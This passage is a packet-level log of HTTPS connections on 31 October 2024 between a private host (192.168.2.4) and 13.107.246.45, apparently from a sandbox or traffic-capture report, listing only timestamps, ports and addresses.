Oct 31, 2024 19:20:38.915657043 CET	443	51443	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.915668011 CET	51443	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.915674925 CET	443	51443	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.918020010 CET	51449	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.918059111 CET	443	51449	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.918133974 CET	51449	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.918318033 CET	51449	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.918334007 CET	443	51449	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.988398075 CET	443	51445	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.988430023 CET	443	51445	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.988482952 CET	443	51445	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.988545895 CET	51445	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.988586903 CET	51445	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.988859892 CET	51445	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.988877058 CET	443	51445	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.988888025 CET	51445	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.988894939 CET	443	51445	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.991817951 CET	51450	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.991841078 CET	443	51450	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.991923094 CET	51450	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.992078066 CET	51450	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.992098093 CET	443	51450	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.993304014 CET	443	51446	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.993366003 CET	443	51446	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.993482113 CET	51446	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.993560076 CET	51446	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.993560076 CET	51446	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.993571997 CET	443	51446	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.993581057 CET	443	51446	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.995661020 CET	51451	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.995677948 CET	443	51451	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:38.995755911 CET	51451	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.995874882 CET	51451	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:38.995887041 CET	443	51451	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.631052017 CET	443	51447	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.635942936 CET	51447	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.635963917 CET	443	51447	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.643461943 CET	51447	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.643467903 CET	443	51447	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.667335987 CET	443	51449	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.679409981 CET	443	51448	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.721961975 CET	51449	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.721961975 CET	51448	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.741334915 CET	443	51450	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.741946936 CET	443	51451	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.754494905 CET	51449	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.754513025 CET	443	51449	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.754975080 CET	51449	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.754981995 CET	443	51449	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.755202055 CET	51448	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.755213022 CET	443	51448	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.755567074 CET	51448	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.755572081 CET	443	51448	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.756684065 CET	51450	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.756699085 CET	443	51450	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.757070065 CET	51450	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.757075071 CET	443	51450	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.757287025 CET	51451	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.757301092 CET	443	51451	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.757651091 CET	51451	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.757659912 CET	443	51451	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.768522978 CET	443	51447	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.768718958 CET	443	51447	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.768769979 CET	443	51447	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.768852949 CET	51447	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.769081116 CET	51447	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.769081116 CET	51447	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.769098997 CET	443	51447	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.769114971 CET	443	51447	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.772010088 CET	51452	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.772051096 CET	443	51452	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.772166967 CET	51452	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.772304058 CET	51452	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.772315979 CET	443	51452	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.884419918 CET	443	51449	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.884454012 CET	443	51449	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.884525061 CET	443	51449	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.884547949 CET	51449	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.884576082 CET	51449	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.884905100 CET	51449	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.884922028 CET	443	51449	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.884932041 CET	51449	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.884938955 CET	443	51449	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.888288021 CET	51453	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.888334036 CET	443	51453	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.888437033 CET	51453	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.888473988 CET	443	51450	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.888530016 CET	443	51450	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.888576984 CET	51450	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.888652086 CET	51450	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.888667107 CET	443	51450	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.888676882 CET	51450	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.888681889 CET	443	51450	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.888746023 CET	51453	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.888763905 CET	443	51453	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.889508009 CET	443	51451	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.889574051 CET	443	51451	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.889621019 CET	51451	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.889718056 CET	51451	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.889723063 CET	443	51451	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.889731884 CET	51451	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.889734983 CET	443	51451	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.891132116 CET	51454	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.891160011 CET	443	51454	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.891230106 CET	51454	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.891370058 CET	51454	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.891381979 CET	443	51454	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.891634941 CET	443	51448	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.891701937 CET	443	51448	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.891767025 CET	51448	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.891782999 CET	51455	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.891793966 CET	443	51455	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.891817093 CET	51448	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.891822100 CET	443	51448	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.891832113 CET	51448	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.891834974 CET	443	51448	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.891850948 CET	51455	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.892014027 CET	51455	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.892025948 CET	443	51455	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.894042969 CET	51456	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.894072056 CET	443	51456	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:39.894169092 CET	51456	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.894289970 CET	51456	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:39.894299984 CET	443	51456	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.530659914 CET	443	51452	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.531400919 CET	51452	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.531419992 CET	443	51452	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.531883001 CET	51452	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.531887054 CET	443	51452	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.624376059 CET	443	51454	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.625664949 CET	51454	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.625675917 CET	443	51454	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.626677036 CET	51454	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.626688004 CET	443	51454	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.628031969 CET	443	51453	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.635009050 CET	443	51456	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.638088942 CET	51456	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.638102055 CET	443	51456	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.638724089 CET	51456	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.638729095 CET	443	51456	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.639194965 CET	51453	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.639229059 CET	443	51453	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.639638901 CET	51453	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.639646053 CET	443	51453	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.678368092 CET	443	51455	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.681193113 CET	51455	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.681230068 CET	443	51455	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.681708097 CET	51455	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.681714058 CET	443	51455	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.689821005 CET	443	51452	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.689852953 CET	443	51452	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.689913034 CET	443	51452	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.689914942 CET	51452	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.689955950 CET	51452	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.692419052 CET	51452	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.692437887 CET	443	51452	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.692457914 CET	51452	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.692464113 CET	443	51452	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.696865082 CET	51457	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.696926117 CET	443	51457	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.697021008 CET	51457	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.697155952 CET	51457	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.697187901 CET	443	51457	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.771714926 CET	443	51453	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.771819115 CET	443	51453	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.771899939 CET	51453	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.772099972 CET	51453	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.772119999 CET	443	51453	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.772130013 CET	51453	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.772135973 CET	443	51453	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.773770094 CET	443	51454	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.773852110 CET	443	51454	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.773920059 CET	51454	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.774094105 CET	443	51456	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.774123907 CET	51454	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.774146080 CET	443	51454	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.774152040 CET	443	51456	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.774168015 CET	51454	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.774174929 CET	443	51454	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.774213076 CET	51456	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.774544954 CET	51456	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.774544954 CET	51456	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.774568081 CET	443	51456	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.774579048 CET	443	51456	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.775995016 CET	51458	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.776024103 CET	443	51458	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.776530027 CET	51458	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.776551008 CET	51458	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.776556015 CET	443	51458	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.777777910 CET	51459	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.777797937 CET	443	51459	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.777852058 CET	51459	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.777992010 CET	51459	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.778006077 CET	443	51459	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.778065920 CET	51460	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.778095007 CET	443	51460	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.778166056 CET	51460	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.778811932 CET	51460	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.778821945 CET	443	51460	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.853562117 CET	443	51455	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.853593111 CET	443	51455	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.853637934 CET	443	51455	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.853748083 CET	51455	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.853988886 CET	51455	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.853997946 CET	443	51455	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.854010105 CET	51455	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.854015112 CET	443	51455	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.858764887 CET	51461	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.858792067 CET	443	51461	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:40.858902931 CET	51461	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.859337091 CET	51461	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:40.859350920 CET	443	51461	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.439255953 CET	443	51457	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.439867020 CET	51457	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.439908981 CET	443	51457	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.440469027 CET	51457	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.440474987 CET	443	51457	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.515590906 CET	443	51458	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.516340971 CET	51458	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.516355991 CET	443	51458	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.516830921 CET	51458	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.516835928 CET	443	51458	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.521408081 CET	443	51460	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.522280931 CET	51460	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.522300005 CET	443	51460	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.522674084 CET	51460	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.522679090 CET	443	51460	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.535332918 CET	443	51459	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.535736084 CET	51459	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.535764933 CET	443	51459	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.536159039 CET	51459	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.536165953 CET	443	51459	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.569628000 CET	443	51457	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.569727898 CET	443	51457	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.569780111 CET	51457	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.569782019 CET	443	51457	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.569823980 CET	51457	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.569969893 CET	51457	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.569986105 CET	443	51457	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.569997072 CET	51457	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.570003033 CET	443	51457	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.573347092 CET	51462	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.573384047 CET	443	51462	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.573471069 CET	51462	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.573647976 CET	51462	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.573658943 CET	443	51462	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.631422997 CET	443	51461	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.631899118 CET	51461	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.631931067 CET	443	51461	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.632427931 CET	51461	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.632435083 CET	443	51461	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.650692940 CET	443	51458	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.650824070 CET	443	51458	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.650877953 CET	51458	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.650955915 CET	51458	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.650955915 CET	51458	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.650971889 CET	443	51458	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.650979996 CET	443	51458	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.654221058 CET	51463	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.654261112 CET	443	51463	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.654339075 CET	51463	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.654524088 CET	51463	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.654540062 CET	443	51463	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.659198999 CET	443	51460	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.659228086 CET	443	51460	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.659269094 CET	443	51460	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.659333944 CET	51460	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.659333944 CET	51460	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.659436941 CET	51460	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.659436941 CET	51460	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.659449100 CET	443	51460	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.659456968 CET	443	51460	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.661663055 CET	51464	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.661684990 CET	443	51464	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.661755085 CET	51464	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.661895037 CET	51464	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.661907911 CET	443	51464	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.785325050 CET	443	51461	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.785458088 CET	443	51461	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.785542965 CET	51461	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.793399096 CET	51461	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.793405056 CET	443	51461	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.793438911 CET	51461	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.793445110 CET	443	51461	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.796955109 CET	51465	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.796991110 CET	443	51465	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.797075033 CET	51465	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.797452927 CET	51465	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.797466040 CET	443	51465	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.834506035 CET	443	51459	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.834575891 CET	443	51459	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.834650040 CET	51459	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.834830046 CET	51459	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.834849119 CET	443	51459	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.834858894 CET	51459	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.834866047 CET	443	51459	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.837713003 CET	51466	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.837744951 CET	443	51466	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:41.837807894 CET	51466	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.838305950 CET	51466	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:41.838321924 CET	443	51466	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.338649035 CET	443	51462	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.339202881 CET	51462	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.339214087 CET	443	51462	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.339718103 CET	51462	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.339723110 CET	443	51462	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.395401955 CET	443	51463	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.396068096 CET	51463	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.396090984 CET	443	51463	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.396878004 CET	51463	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.396886110 CET	443	51463	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.417210102 CET	443	51464	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.417854071 CET	51464	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.417880058 CET	443	51464	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.418839931 CET	51464	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.418845892 CET	443	51464	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.647588015 CET	443	51462	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.647769928 CET	443	51462	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.647847891 CET	51462	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.647912979 CET	51462	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.647927999 CET	443	51462	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.647941113 CET	51462	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.647957087 CET	443	51462	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.648061037 CET	443	51463	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.648097992 CET	443	51463	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.648139000 CET	443	51463	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.648179054 CET	51463	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.648179054 CET	51463	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.648478031 CET	51463	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.648478031 CET	51463	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.648504019 CET	443	51463	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.648516893 CET	443	51463	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.651674032 CET	51467	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.651717901 CET	443	51467	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.651789904 CET	51467	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.652334929 CET	51468	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.652344942 CET	443	51468	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:42.652389050 CET	51468	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.652466059 CET	51467	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:42.652483940 CET	443	51467	13.107.246.45	192.168.2.4
